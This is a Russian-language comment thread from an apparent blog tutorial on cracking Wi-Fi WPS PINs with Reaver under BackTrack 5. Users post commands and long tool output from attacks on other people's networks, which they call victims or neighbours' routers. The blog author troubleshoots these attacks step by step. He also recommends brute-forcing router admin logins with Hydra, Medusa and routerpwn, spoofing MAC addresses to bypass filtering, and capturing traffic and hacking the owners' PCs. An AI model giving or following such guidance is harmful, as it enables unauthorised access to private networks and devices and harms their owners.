я установил R2.
у меня такая ситуация
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacom from 02:02:CF …
[+] Switching mon0 to channel 1
[!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)
[!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)
[!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)
[!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)
[!] WARNING: fail to associate with 02:02:… (ESSID: U!com_Network)
и так вот уже час … Все у меня нормально ?
Давайте с вами договоримся сразу! Предоставляйте и команды и их вывод. Говорите подробно, что вы делать и что у вас получилось.
Что касается этого сообщения – какой у вас уровень сигнала?
попытка #2.
[+] Waiting for beacon from 34:08: …
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Associated with 34:08:…. (ESSID: KMARAZZI)
И все, больше не чего не происходит вот уже 2,5 часа. Имеет смысл ждать?
P.S. как узнать уровень сигнала ? Это “PWR” или “CH” ?
“PWR” – power (мощность)
“CH” – channel (канал)
…
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
….
значит идет переключение каналов -> нужно поставить № канала на котором работает АР.
покажите команды, какую вводили и их вывод
p.s.: вам похоже все равно о том что я писал, когда отвечал на предыдущее ваше сообщение. в след. раз будете пользоваться поиском.
“p.s.: вам похоже все равно о том что я писал, когда отвечал на предыдущее ваше сообщение. в след. раз будете пользоваться поиском.” – Что вы имеете введу? Я написал все что было.
скопируй человеку все команды которые вводил и что происходило после этих команд тоже.и тогда тебе помогут и объяснят твои проблемы
Вы мне пишите вывод команд(ы). Но мне нужно не только это. Все команды, которые вы вводили и их вывод.
Про поиск я имею ввиду, что если ввести “Switching mon0 to channel” в поиск – вы узнаете в чем проблема.
1000 SORRY. У меня такой вопрос. Допустим мне стал известен ключ от wifi типа (AE:5B:7F:3A:03:D0:AF:9B:FD:C7:E2). Зачем оно мне? Это же не пароль. Как я могу этим воспользоваться ???
Again 1000 Sorry.
Об этом вы можете узнать здесь – http://www.aircrack-ng.org/doku.php?id=aircrack-ng
Спасибо вам за статью.Всё очень подробно.Получилось с первого раза. :smile: Десять часов и четыре минуты.
Всегда пожалуйста! Подписывайтесь (E-MAIL & RSS), впереди много интересного.
Заметил, что некоторые роутеры не любят, когда делают паузы при подборе пина ривером.
Начинаю подбор, скорость перебора хорошая – 3 секунды на пин. Через некоторое время останавливаю ривер (ctrl+C). Запускаю опять, восстанавливаю прежнюю сессию, и посыпались эти sending eapol start request, receive timeout occured. И так до тех пор, пока сам хозяин не перезагрузит роутер, или в доме не погаснет свет.
Интересно, может на это влиять настройка роутера Station Keep Alive (интервал в секундах между проверками активности беспроводных устройств, входящих в локальную сеть. Если задано значение 0, проверка не выполняется). А по умолчанию стоит именно 0.
Хороший вопрос. Пока не знаю, как на него ответить, с такой ситуацией не сталкивался. Но как узнаю, отпишу.
Если вы узнаете быстрее, пишите тоже =)
Вот, кажется подходит под ситуацию – http://dlink.ru/ru/faq/92/508.html
Здравствуйте. У меня проблема по поиску ключа, все сделал как по инструкции, но когда дошел до:
reaver -i mon0 -b ХХ:ХХ:ХХ:ХХ:ХХ:ХХ -vvОтвет всегда один:
reaver: command not foundт.е. команда не найдена :neutral:Подскажите что делать :?:
Здравствуйте. Какой дистрибутив используйте?
Если выводится сообщение, как у вас (reaver: command not found) значит reaver не установлен.
Советую вам скачать BackTrack 5 R2 с предустановленным reaver – http://www.backtrack-linux.org/downloads/
Добрый день! Просканил вифи точку реавиром выдала мне она пин и пароль. НО Этот пароль не входит( Что делать? ( на первый раз его ввожу она не подключается/ говорит время подкл истекло, дальше на 2 раз подключается, но сначала пишет нет интернет подключения а потом эта надпись пропадает и показывает мне что я в сети, но раздачи инета нету(((( шо делать? ( входил на Мак ос) ( вводил пароль на убунту та ваще не подключилась)
Может быть стоит фильтрация по МАС? У АР есть другие клиенты, которые к ней подключены?
Mac у меня поставлен такой же как и у клиента который был подключен к сети.. сейчас я вижу в сети только принтер по ip сканеру ( походу там прокси)
Правильно ли я понял – у вас есть доступ к wifi сети. Т.е. вы к ней подключены, да?
да доступ есть.Запустил прогу айписканер для макинтоша.. Нашел только принтер и все(( Т.е у них либо прокси либо еще че то интересное . либо у них вообще нету интернета
Хорошо. На вашем месте я бы просканировал всю сеть + зашел бы на АР и посмотрел, какие имеются настройки. Так же имеет место добавить свой МАС-адрес в список доверенных, если там конечно же стоит МАС-фильтр.
Также можно собрать их трафик, взломать ПК и посмотреть что там =)
Вариантов куча.
Нашел айпи роутера зашел а там пароль не походит админ админ)))))))))) че делать)))
Какая модель роутера? Проверить на стандартные логин/пароль.
Если не получится, тогда воспользоваться программами:
THC-Hydra – http://www.thc.org/thc-hydra/
Medusa – http://www.foofus.net/~jmk/medusa/medusa.html
p.s.: также можно воспользоваться вот этим продуктом – http://routerpwn.com/
wifi d-link dir-615 Hardware version: E4 firmware version 5.10
Попробуйте воспользоваться программами, которые предоставил. И routerpwn тоже.
Здравствуйте Нub lex Установил BT 5R2 ситуация та же не проходит команда на запуск реавер (сравнил файлы в папке BT 5R1 т е реавер у меня был установлен но не запускался ) тут что -то другое Я УЖЕ попрбовал и на ВМ и с флешки и установил BT 5 второй ОС не запускается реавер
Здравствуйте Андрей. Это очень странно, так как reaver установлен в BT5R2. Покажите как вы вводите команды и их вывод.
p.s.: skype = hub-lex-21
Здравствуйте Hub lex Вводиться команда reaver-i mon-bxxxxxxxxxxxxxx-c6-vv reaver-i:command not found ВТ-5R2 я установил KDE но в прошлый раз был ГНОМ И ТОЖЕ САМОЕ По skype не могу общаться скорости нет выхожу через модем МТС
Если вы вводите именно так так показали, тогда вам нужно поставить пробелы. Введите только команду reaver и нажмите Enter, что произойдет?
Такой у меня вопрос:
1) На сколько я понял, при взломе через WPS подключенные сторонние клиенты на требуются (как при взломе WEP)
2) Если на АР WPS отсутствует, reaver должен выдать ошибку?
И еще несколько вопросов.
3. Не сталкивались с ситуацией, ошибка.
WARNINGP Failed to associate’1 with хх:хх:хх:хх:хх:хх (ESSID: ххххххх)
Я так понял это фильтр по MAC, отследил несколько адресов клиентов, попробовал залезть под подменными MAC, ошибка повторяется.
4. Ошибка WPS transaction failed (code: 0xQ3), re-trying last pin
Я так пологою означает что роутер не поддерживает WPS? На нем есть кнопка Qss, что-то тоже связанное с автонастройкой безопасности, но я так полагаю это уже что-то другое. Роутер TP-Link-овский.
5. Может ли фильтрация по MAC помешать программе WASH проверить сеть на наличие WPS?
6. хх- хх-хх-хх-хх-хх-00-00-00-00-00-00-00-00-00-00
Эта куча нолей в конце адреса mon0 это нормально?
Я могу поменять адрес wlan0, но mon0 все равно будет реальный + куча нолей.
а как бороться с этой ошибкой WPS transaction failed (code: 0xQ3)??еще пин код состоит из только из 8 цифр?
Здравствуйте Hub-lex Да с пробелами реавер запустился и R1 и R2 но далеко не ушел т к на этой точке фильтрация МАС адресов
Подскажите пожалуйста по такому вопросу:
Нахожу в радиусе действия открытую сеть. Подключаюсь к ней. Все проходит. Интернет есть. Сеть OPN пишет при команде airodump-ng mon0
Интернет работает, но через пару дней при подключении говорит что подключение ограничено, без доступа к сети интернет. После первого такого раза нашел вторую сеть, и подключился к ней. Через пару дней опять тоже самое. Сети все равно OPN показывает.
Может это быть что-то с адаптером? Или что такое еще может быть? (ОС: Windows 7 Ultimate)
Уважаемый Hub-lex!!! Такая-же беда как и у HalPls… по началу думал что это только у меня!!! Ан нет!!! проблему не удается решить ( колдовал с настройками) может какая-то хитрость существует??? Спасибо.
Из какой ОС заходите?
Т.е. подключаетесь (есть Сети и т.п.), но потом все пропадает?
Когда подключились к wifi сети, заходили ли на АР (роутер), чтобы посмотреть какие настройки стоят?
p.s.: опишите более детально ваши действия
Роутер то чужой :-)) , как мне на него зайти…
Ломануть, как еще)
+ проверить его на пароли по дефолту, например:
login: admin
pass: < пусто>
OR
login: admin
pass: admin и т.п.
Ответ очевиден. Иметь под боком дефолтные пассы разных роутеров. Ты знаешь, что это скажем TP-Link – ну и значит долбишь TP-Link. Плюс к тому пробить какой пров – какие роутеры использует. У прова порой есть дефолтные комбинации: user + pass. А то Ты можешь вбивать “1234″, “admin”, “root” – а там элементарный beeline. Конечно покапаться надо будет, поискать – а кто говорил что будет просто. Просто даже кошки не еб…
Да и ещё :в BackTrack всё работает (т.е. соединение с инетом есть) , а когда захожу под Vista есть только соединение с локалкой, с инетом соединения нет….HELP!!!
Ну если по локальной сети есть соединение, тогда лучше будет зайти на АР (роутер) и посмотреть, что там за настройки. Мне кажется так будет проще сделать, чем годать.
Спасибо за совет! К сожалению не очень знаю как попасть,зайти в настройки роутера…. как говориться : пойду курить мануалы :-)))
Здравствуйте Hub-lex!
Успешно прошел взлом первой жертвы DLink за 12 часов командой reaver -i mon0 -b 1C:7E:E5:38:68:A2 -c 1 -vv –nack
А вот вторая жертва TPlink пробирает pin до 100%, а пароля нет!
…
[+] Trying pin 23259454
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 23259461
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 23259478
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] 100.00% complete @ 2012-05-10 23:57:53 (5 seconds/pin)
[+] Pin cracked in 5233 seconds
[+] WPS PIN: ’23259478′
Что делать? Как узнать пароль?
Вот такой командой
reaver -i mon0 -b F8:D1:11:6E:A2:08 -c 4 -vv –no-nack –eap-terminate
Какую флешку порекомендуете для загрузки с нее бак-трака? Любую больше 2 гб?
Пробовал с карты памяти 2гб microSD через usb-адаптер и не пошло. Как диск в биосе ее видно, но при загрузке белый курсор в левом верхнем углу монитора на черном фоне…
А то куплю не ту флешку, и увижу белый курсор…
4 гб флэшка отлично работает.главное образ записать правильно
Столкнулся с интересным глюком
Установил iso BackTrack гном на флешку
Гружусь с этой флешки, запускаю иксы все нормально
Доустанавливаюс с свн reaver, запускаю мониторинг сети, вижу интересующую меня мою сетку
Начинаю подбор пароля и тишина подбор стопится(постоянно эти сообщения) на этом
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
указываю через параметр -р какой у меня пин и ничего не меняется. он пробует этот пин и ничего не возвращает, тока ошибки
перезагружаю ноут
иксы на этот раз не стартую
запускаю ВСЕ ТЕ ЖЕ команды что и под иксами, с указанием пина тут же выдает пароль
в чем глюк?
есть подозрение что он под иксами не видит(или не может использовать) вайфайную карту, но ведь в таком случае он бы и сеть не мониторил и ничего не выдавал? или я не прав?
Ребят помогите загружаю с диска как на видео где сразу boot если не писать то перезагружается,а если писать root или startx то секунд через 5 загружается нажимаю boot text mode загружается сразу без startx и через несколько секунд что-то с видео чёрные полосы посередине и искажение внизу.Пользуюсь BackTrack 5 R2.
Pomogite! Pogaluista!
vvogu -
iwconfig
airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b xxxxxxxxx -vv
otvet
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 00:25:53:09:7B:18
[+] Switching mon0 to channel 11
[+] Associated with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
i ni4ego ne proishodit
WPS – est ploveril wash-om
50# – signal sredniu
proboval vot tak ewe
reaver -i mon0 -b xxxxxxxxx -c 11 -vv
RReaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 00:25:53:09:7B:18
[!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Associated with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:25:53:09:7B:18 (ESSID: Alice-53440257)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
i tak do beskone4nosti
pomogite razobratsya.
Проблема может быть в уровне сигнала. Попробуйте на другой АР, у которой уровень сигнала лучше.
на мою проблему,немного выше что то скажете?
А еще раз, что за проблема?
алексей 16 Май 2012 в 20:46
как то что то опять не получилось root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2354 dhclient3
2412 dhclient3
Process with PID 2412 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR2425 ath5k – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
16:15:51 No such BSSID available.
Please specify an ESSID (-e).
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
No replay interface specified.
"aireplay-ng --help" for help.
root@bt:~#
Ya proboval na drugoi – vse polu4ilos i signal takoi ge primerno. Kuplu na dnyah antenu dlya wifi – poprobuu ewe raz. sps za otvet.
Всё посмотрел видео BackTrack 5 R2 как устанавливать всё вроде работает,только после нажатия boot text mode загрузка и опять тоже самое посредине чёрные полосы,а внизу рябь но и картинку видно с загрузкой BackTrack.Скачал 32,а система стоит на ноуте 64 7 максимальная.Hub-lex помоги!
Какие то странные проблемы, по моему… Позвоните в скайп – hub-lex-21
hub-lex спасибо на компе пошла нормально 32 7-ке
хотелось бы и на ноут попробую на 64 скачать!
А на Windows 7 эта програма работаэт
Забудьте про Windows 7. Делайте все в BackTrack.
Так значит не важно какая операцыонная система, просто с диска запускать BackTrack и все делать по инструкцыи
Да. Советую найти в Сети информацию о том, что такое Live-CD/USB. Потому что, как я вижу у вас с этим проблемы. Прочитайте и как мин-ум вопрос, который вы задали отпадет сам по себе.
p.s.: лучше использовать Live-USB, так как у USB скорость считывания гораздо выше чем у CD. А отсюда след. что работа будет выполнена быстрее.
Hub-lex на ноуте всё равно так и есть,а накомпе работает ну да ладно!Щас о другом подскажи как правильно установить программу и какую? чтоб сменить мак адрес, накомпе хотел через выделенку подсоединить начал прописывать ip ну и прописал какую то систему их.Так огорчённый провайдер или админ через 20 минут прибежал,а там через ппое,как подсоединить BackTrack 5 R2 подскажи пожалуйста!
МАС-адрес меняет программа macchanger. Установить так: # apt-get install macchanger
Другую часть вопроса не понял. По возможности писать лучше разборчиво и по шагам:
1. что хочу сделать
2. что сделал!
3. что получилось
4. как мне разобраться
как подключиться через выделенку не прописывая ип маску шлюз, только логин и пароль!
Вот это попробуйте – http://www.backtrack-linux.org/forums/showthread.php?t=37432
Здравствуйте скачал я этот BackTrack 5 R2 и не могу понять Как сделать загрузочный usb а не диск?в архиве который скачал нет образа чтобы даже На диск записать.На флешку все таки Лучше было бы:)
Здравствуйте, вот здесь читать – http://www.backtrack-linux.org/tutorials/usb-live-install/
Добрый вечер,Hub-lex! Подскажите,пожалуйста,как установить macchanger в BackTrack 5 и как пользоваться? Спасибо.
Добрый, установить # apt-get install macchanger
Пользоваться # man macchanger
Я совсем запутался Да еще и с этим macchanger я с телефона еще пишу много выйдет писать вам про ошибки и т.д если у вас есть время разрешите вам позвонить На скайп Заранее спасибо
Добрый день! Я всё делаю как перечислено выше, но после того как я ввожу команду: reaver -i mon0 -b xxxxxxxxxxxxxx -vv он пишет: reaver: command not found. Помогите пожалуйста не знаю что делать.
Какой дистрибутив?
BackTrack 5 R2
Быть такого не может, чтобы в нем не было reaver. Точно ли BT5R2? Может все таки BT5R1?
ссылка на этом сайте, в самом начале.
Я извиняюсь и правда BackTrack 5 R1
Всё получилось, только при попытке уже самого взлома пишет:
reaver v1.4 wifi protected setup attack tool
waiting for beacon from 20:7C:…
switching mon0 to chanel 1 и т.д.
Продолжается это постоянно и больше ничего не происходит.
ммм…мне это ни о чем не говорит. предоставьте команды, которые вводите и их вывод
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[-] Failed to initialize interface ‘mon0′
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.
Как с этим бороться :?:
пока что вижу, что что то не так с интерфейсом “Failed to initialize interface ‘mon0?”. старайтесь переводить фразы и ошибки.
к тому же, то что представили вы – этого не достаточно! покажите команды, которые вводите и их вывод
Добрый вечер,Hub-lex. Подскажите,пожалуйста,как менять Mac,какие комады вводить? Как фильтрацию обойти? Cпасибо.
посмотрите внимательнее коментарии к статьям. имейте ввиду что есть целый раздел о Wi-Fi, т.е. тема не ограничивается только одной статьей.
ваш вопрос был много раз оговорен.
как запустить BackTrack 5 R2?
это шутка?
логин root
пароль toor
и ввести startx
спасибо)
Доброго времени суток!
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[-] Failed to initialize interface ‘mon0?
[-] Failed to recover WPA key
[+] Nothing done, nothing to save.
выдало после ввода reaver -i mon0 -b bssid -vv . bssid были разные, но результат тотже.(ubuntu10.) Сечас поставил BackTrack 5 и выдаёт
[+] Waiting for beacon from CC:96:A0:45:F0:AA
[+] Switching mon0 to channel 6
[!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID:javascript:grin(‘:!:’)
Доброго, старайтесь смотреть комментарии и рекомендации в них. Одна из рекомендаций – покажите команды, которые вводите и их вывод
root@bt:~# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1285 dhclient3
1337 dhclient3
Process with PID 1285 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR9285 ath9k – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 5 ][ Elapsed: 8 s ][ 2012-05-22 11:35
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
CC:96:A0:45:F0:AA -33 10 0 0 6 54e WPA2 CCMP PSK MTC
BSSID STATION PWR Rate Lost Packets Probes
root@bt:~# reaver -i mon0 -b CC:96:A0:45:F0:AA -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from CC:96:A0:45:F0:AA
[+] Switching mon0 to channel 6
[!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)
[!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)
[!] WARNING: Failed to associate with CC:96:A0:45:F0:AA (ESSID: MTC)
поробуйте так – # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -e network_name -vv -A
Спасибо за ответ!
[+] Switching mon0 to channel 6
[+] Waiting for beacon from CC:96:A0:45:F0:AA
[+] Associated with CC:96:A0:45:F0:AA (ESSID: network_name)
теперь можно жать ?
да, теперь остается только ждать.
алексей 20 Май 2012 в 17:51
алексей 16 Май 2012 в 20:46
как то что то опять не получилось root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2354 dhclient3
2412 dhclient3
Process with PID 2412 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR2425 ath5k – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
